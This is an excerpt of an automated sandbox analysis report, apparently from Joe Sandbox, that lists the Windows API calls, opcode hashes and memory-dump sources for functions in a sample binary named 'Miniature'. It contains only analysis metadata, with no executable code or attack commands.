                                                  • Opcode ID: e5101075e273006b403160d04dd5a64e017936bc713cbdeb67906715ac0082ab
                                                  • Instruction ID: 514ad9934171017ba9c75bcfaccaf1f64e693227240797a683a84220072b1af5
                                                  • Opcode Fuzzy Hash: e5101075e273006b403160d04dd5a64e017936bc713cbdeb67906715ac0082ab
                                                  • Instruction Fuzzy Hash: ED1190B214021DBFEF258E64CC85EEB7F6DEF08798F014114BB48A6054C6769C21DBA0
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00FB4282,?), ref: 00FB41D3
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00FB41DA
                                                  • EncodePointer.KERNEL32(00000000), ref: 00FB41E6
                                                  • DecodePointer.KERNEL32(00000001,00FB4282,?), ref: 00FB4203
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                  • String ID: RoInitialize$combase.dll
                                                  • API String ID: 3489934621-340411864
                                                  • Opcode ID: ba35d07fb64a7fbea4c01cfb9f65469178c7bd36f4f2600cdef031acbc19700c
                                                  • Instruction ID: 96f85fb93ed88835904010faaa7293eebd25095a2aad70281567de9e20b3bbdf
                                                  • Opcode Fuzzy Hash: ba35d07fb64a7fbea4c01cfb9f65469178c7bd36f4f2600cdef031acbc19700c
                                                  • Instruction Fuzzy Hash: E2E0E570A90311AFDB302F75ED49B4A3A69B719B06F608428F4C1DA08CCBBF50849F08
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00FB41A8), ref: 00FB42A8
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00FB42AF
                                                  • EncodePointer.KERNEL32(00000000), ref: 00FB42BA
                                                  • DecodePointer.KERNEL32(00FB41A8), ref: 00FB42D5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                  • String ID: RoUninitialize$combase.dll
                                                  • API String ID: 3489934621-2819208100
                                                  • Opcode ID: e724611346146a4c9f174b565ac784abd51a6e16b39c9a483663dbb835dac9c3
                                                  • Instruction ID: c8bfc80bb557a16bfa8c53070e4b87946cbdf3a86fcd55a321b037ab68afc2d4
                                                  • Opcode Fuzzy Hash: e724611346146a4c9f174b565ac784abd51a6e16b39c9a483663dbb835dac9c3
                                                  • Instruction Fuzzy Hash: A9E0B670A91300ABDB309F61AD0EB463E6CB704B16F604519F8C1D948CCBBF5504DB18
                                                  APIs
                                                  • GetClientRect.USER32(?,?), ref: 00F921B8
                                                  • GetWindowRect.USER32(?,?), ref: 00F921F9
                                                  • ScreenToClient.USER32(?,?), ref: 00F92221
                                                  • GetClientRect.USER32(?,?), ref: 00F92350
                                                  • GetWindowRect.USER32(?,?), ref: 00F92369
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Rect$Client$Window$Screen
                                                  • String ID:
                                                  • API String ID: 1296646539-0
                                                  • Opcode ID: 71c382d1b24b37662467d60e925897a814f019bda2ff190c59ac8119fb959a18
                                                  • Instruction ID: 77202379691eeeee6d5023a898ff954a78cff8734ee59ca26b69574cb31f6a75
                                                  • Opcode Fuzzy Hash: 71c382d1b24b37662467d60e925897a814f019bda2ff190c59ac8119fb959a18
                                                  • Instruction Fuzzy Hash: A3B1823990024AEBEF50CFA8C581BEDB7B1FF48710F148129ED59EB254DB34A950EB64
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: _memmove$__itow__swprintf
                                                  • String ID:
                                                  • API String ID: 3253778849-0
                                                  • Opcode ID: c1d4d61aec3e97959054d52700e379228b0f43a147c246075d4bbaf544f73aac
                                                  • Instruction ID: b60827033500fe301f3e86dab3d4c5315cadc5359c509c72b66862ab57524f6d
                                                  • Opcode Fuzzy Hash: c1d4d61aec3e97959054d52700e379228b0f43a147c246075d4bbaf544f73aac
                                                  • Instruction Fuzzy Hash: 5B61D13150025EABDF11EF60CC91EFE77A8BF05348F444559FA959B1A2DB38AC06EB50
                                                  APIs
                                                    • Part of subcall function 00FA1A36: _memmove.LIBCMT ref: 00FA1A77
                                                    • Part of subcall function 0101147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0101040D,?,?), ref: 01011491
                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0101091D
                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0101095D
                                                  • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 01010980
                                                  • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 010109A9
                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 010109EC
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 010109F9
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                  • String ID:
                                                  • API String ID: 4046560759-0
                                                  • Opcode ID: 3d49f9ff7f22eb8b8d0bec9798c00b564f56d96004f93064dee78db9db11c7de
                                                  • Instruction ID: 19fc91dbcad704652f9731c784ed8cfbf9135f32401d86fe44f275778530ee61
                                                  • Opcode Fuzzy Hash: 3d49f9ff7f22eb8b8d0bec9798c00b564f56d96004f93064dee78db9db11c7de
                                                  • Instruction Fuzzy Hash: 2E516471208301AFE710EF64C895E6ABBE9BF85310F004919F5C9872A9DB39E945DB92
                                                  APIs
                                                  • GetMenu.USER32(?), ref: 01015E38
                                                  • GetMenuItemCount.USER32(00000000), ref: 01015E6F
                                                  • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 01015E97
                                                  • GetMenuItemID.USER32(?,?), ref: 01015F06
                                                  • GetSubMenu.USER32(?,?), ref: 01015F14
                                                  • PostMessageW.USER32(?,00000111,?,00000000), ref: 01015F65
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Menu$Item$CountMessagePostString
                                                  • String ID:
                                                  • API String ID: 650687236-0
                                                  • Opcode ID: 94390f1ff8402dae3fba4053bac6951dae7c608661c55be0d0b290e70b3ebcc6
                                                  • Instruction ID: 689aeb5563ad5491a5177f92ebd84e158ac75514f6fc1d75b36bf83fa95469fe
                                                  • Opcode Fuzzy Hash: 94390f1ff8402dae3fba4053bac6951dae7c608661c55be0d0b290e70b3ebcc6
                                                  • Instruction Fuzzy Hash: C251AD35A00219AFDF21EF64CC45AAEB7F5EF89310F104099F951BB355CB38AE418B90
                                                  APIs
                                                  • VariantInit.OLEAUT32(?), ref: 00FEF6A2
                                                  • VariantClear.OLEAUT32(00000013), ref: 00FEF714
                                                  • VariantClear.OLEAUT32(00000000), ref: 00FEF76F
                                                  • _memmove.LIBCMT ref: 00FEF799
                                                  • VariantClear.OLEAUT32(?), ref: 00FEF7E6
                                                  • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00FEF814
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Variant$Clear$ChangeInitType_memmove
                                                  • String ID:
                                                  • API String ID: 1101466143-0
                                                  • Opcode ID: 1d9c5f06e4986772c2f6864a8aa6460a418f8bed913c8374a8a688a60addb145
                                                  • Instruction ID: 49458c12875d004a5cb5b6bd7d9e38642bcbc132eb2c116186878a68d8227598
                                                  • Opcode Fuzzy Hash: 1d9c5f06e4986772c2f6864a8aa6460a418f8bed913c8374a8a688a60addb145
                                                  • Instruction Fuzzy Hash: E9516CB5A00209EFDB24CF58C884AAAB7B8FF4C354B15856AE949DB304D735E915CFA0
                                                  APIs
                                                  • _memset.LIBCMT ref: 00FF29FF
                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00FF2A4A
                                                  • IsMenu.USER32(00000000), ref: 00FF2A6A
                                                  • CreatePopupMenu.USER32 ref: 00FF2A9E
                                                  • GetMenuItemCount.USER32(000000FF), ref: 00FF2AFC
                                                  • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00FF2B2D
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                  • String ID:
                                                  • API String ID: 3311875123-0
                                                  • Opcode ID: 6b115cfe2cc98ab1564354dc59b218bc12a9c3244c4d950149ae4642ad865196
                                                  • Instruction ID: f61b3dd5c8d9f610da9e44cfb3494693d985b0b7376a4c567a3891f6f04f80ed
                                                  • Opcode Fuzzy Hash: 6b115cfe2cc98ab1564354dc59b218bc12a9c3244c4d950149ae4642ad865196
                                                  • Instruction Fuzzy Hash: F751BE70A0030EDFDF65CF68C888BBEBBF4AF84324F104159EA119B2A5D7B49944EB51
                                                  APIs
                                                    • Part of subcall function 00F929E2: GetWindowLongW.USER32(?,000000EB), ref: 00F929F3
                                                  • BeginPaint.USER32(?,?,?,?,?,?), ref: 00F91B76
                                                  • GetWindowRect.USER32(?,?), ref: 00F91BDA
                                                  • ScreenToClient.USER32(?,?), ref: 00F91BF7
                                                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00F91C08
                                                  • EndPaint.USER32(?,?), ref: 00F91C52
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                  • String ID:
                                                  • API String ID: 1827037458-0
                                                  • Opcode ID: e745307ac16fed0f3aebe2f669120a6900102bf29bcb9341edb9bf38c87f7d5d
                                                  • Instruction ID: cf49fcfc2d02362b3e8902bd265715c3dc1bf43621a3db117c3f911b15040165
                                                  • Opcode Fuzzy Hash: e745307ac16fed0f3aebe2f669120a6900102bf29bcb9341edb9bf38c87f7d5d
                                                  • Instruction Fuzzy Hash: C441E231544302AFEB21DF24C885FBA7BE8FB99360F240568F995862A5C7369804EB61
                                                  APIs
                                                  • ShowWindow.USER32(010577B0,00000000,011B56B0,?,?,010577B0,?,0101BC1A,?,?), ref: 0101BD84
                                                  • EnableWindow.USER32(?,00000000), ref: 0101BDA8
                                                  • ShowWindow.USER32(010577B0,00000000,011B56B0,?,?,010577B0,?,0101BC1A,?,?), ref: 0101BE08
                                                  • ShowWindow.USER32(?,00000004,?,0101BC1A,?,?), ref: 0101BE1A
                                                  • EnableWindow.USER32(?,00000001), ref: 0101BE3E
                                                  • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0101BE61
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Window$Show$Enable$MessageSend
                                                  • String ID:
                                                  • API String ID: 642888154-0
                                                  • Opcode ID: 7ce567e3d06eba2234953316b37b6bf01faece3de6d598b2cd5c7de0e7ed65bb
                                                  • Instruction ID: 4b0f5ffe83add930bf0f1268c4089df8d99d9f537357faa7cd1a524833d386c9
                                                  • Opcode Fuzzy Hash: 7ce567e3d06eba2234953316b37b6bf01faece3de6d598b2cd5c7de0e7ed65bb
                                                  • Instruction Fuzzy Hash: 64416334600144AFDB66DF28C489B947FF1FF09314F6841E9FA888F2AAC735A845CB51
                                                  APIs
                                                  • GetForegroundWindow.USER32(?,?,?,?,?,?,0100550C,?,?,00000000,00000001), ref: 01007796
                                                    • Part of subcall function 0100406C: GetWindowRect.USER32(?,?), ref: 0100407F
                                                  • GetDesktopWindow.USER32 ref: 010077C0
                                                  • GetWindowRect.USER32(00000000), ref: 010077C7
                                                  • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 010077F9
                                                    • Part of subcall function 00FF57FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00FF5877
                                                  • GetCursorPos.USER32(?), ref: 01007825
                                                  • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 01007883
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                  • String ID:
                                                  • API String ID: 4137160315-0
                                                  • Opcode ID: 31a634a020f604b6d52b5de146c5a74a833568ca3dd7041916bff2282f5c1b5e
                                                  • Instruction ID: 8f12d19ae7f88170f9aa452cfc6c2955db8edcf55735ba3b676d1cb66742e252
                                                  • Opcode Fuzzy Hash: 31a634a020f604b6d52b5de146c5a74a833568ca3dd7041916bff2282f5c1b5e
                                                  • Instruction Fuzzy Hash: 4D31C172504309ABE721DF54C848F9BBBE9FF88714F100919F5D597181CA39EA09CBD2
                                                  APIs
                                                    • Part of subcall function 00FE8CC7: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00FE8CDE
                                                    • Part of subcall function 00FE8CC7: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00FE8CE8
                                                    • Part of subcall function 00FE8CC7: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00FE8CF7
                                                    • Part of subcall function 00FE8CC7: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00FE8CFE
                                                    • Part of subcall function 00FE8CC7: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00FE8D14
                                                  • GetLengthSid.ADVAPI32(?,00000000,00FE904D), ref: 00FE9482
                                                  • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00FE948E
                                                  • HeapAlloc.KERNEL32(00000000), ref: 00FE9495
                                                  • CopySid.ADVAPI32(00000000,00000000,?), ref: 00FE94AE
                                                  • GetProcessHeap.KERNEL32(00000000,00000000,00FE904D), ref: 00FE94C2
                                                  • HeapFree.KERNEL32(00000000), ref: 00FE94C9
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                  • String ID:
                                                  • API String ID: 3008561057-0
                                                  • Opcode ID: ff97aa44bf06131d4ce86cd35413bf78ffbf44dcfdf64289474613edf9226c7e
                                                  • Instruction ID: 4ffffa0e708fb7074a9fca511b3c4138af72505be5003279f8b976ae4cd24627
                                                  • Opcode Fuzzy Hash: ff97aa44bf06131d4ce86cd35413bf78ffbf44dcfdf64289474613edf9226c7e
                                                  • Instruction Fuzzy Hash: B811AF32905604FFDB20DFA5CC49FAEBBA9FB45325F208018F88597254D77A9941EB70
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00FE9200
                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00FE9207
                                                  • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00FE9216
                                                  • CloseHandle.KERNEL32(00000004), ref: 00FE9221
                                                  • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00FE9250
                                                  • DestroyEnvironmentBlock.USERENV(00000000), ref: 00FE9264
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                  • String ID:
                                                  • API String ID: 1413079979-0
                                                  • Opcode ID: 86e2400c7cc3d1ec2925be5bdf2021e3833d760c4d6679cb0ed38aba0ed22b91
                                                  • Instruction ID: 93f309d7e509b0dfdaa5cb537105c8c69820ece6d9af551eb739c8b1f0f61aca
                                                  • Opcode Fuzzy Hash: 86e2400c7cc3d1ec2925be5bdf2021e3833d760c4d6679cb0ed38aba0ed22b91
                                                  • Instruction Fuzzy Hash: 6F11597290524EBBDF218F94ED49FDE7BA9EF48314F144065FE04A2164C3BA8D60EB60
                                                  APIs
                                                  • GetDC.USER32(00000000), ref: 00FEC34E
                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 00FEC35F
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00FEC366
                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00FEC36E
                                                  • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00FEC385
                                                  • MulDiv.KERNEL32(000009EC,?,?), ref: 00FEC397
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: CapsDevice$Release
                                                  • String ID:
                                                  • API String ID: 1035833867-0
                                                  • Opcode ID: 4259c79670cb541cd11c63e65dc66402f6b52c6b2f711150eb7e579e6fac9f2e
                                                  • Instruction ID: bd33705a8c5161e7210117abaca302ff39ed2e86998fe420efaeb293c3d308ae
                                                  • Opcode Fuzzy Hash: 4259c79670cb541cd11c63e65dc66402f6b52c6b2f711150eb7e579e6fac9f2e
                                                  • Instruction Fuzzy Hash: 06014475E00318BFEF209FA69C49A5EBFB8EB48761F104065FE48A7284D6759D11CFA0
                                                  APIs
                                                    • Part of subcall function 00F916CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00F91729
                                                    • Part of subcall function 00F916CF: SelectObject.GDI32(?,00000000), ref: 00F91738
                                                    • Part of subcall function 00F916CF: BeginPath.GDI32(?), ref: 00F9174F
                                                    • Part of subcall function 00F916CF: SelectObject.GDI32(?,00000000), ref: 00F91778
                                                  • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0101C57C
                                                  • LineTo.GDI32(00000000,00000003,?), ref: 0101C590
                                                  • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0101C59E
                                                  • LineTo.GDI32(00000000,00000000,?), ref: 0101C5AE
                                                  • EndPath.GDI32(00000000), ref: 0101C5BE
                                                  • StrokePath.GDI32(00000000), ref: 0101C5CE
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                  • String ID:
                                                  • API String ID: 43455801-0
                                                  • Opcode ID: 933582a3f0a542ee9c5e124eca37db317366bc26d94ca847c5582aae66d67eaf
                                                  • Instruction ID: 1aef3e9366de4fb9ffe6e447cae6cdcd3dffcb0f54b2a86ec28610b1f5da9e9f
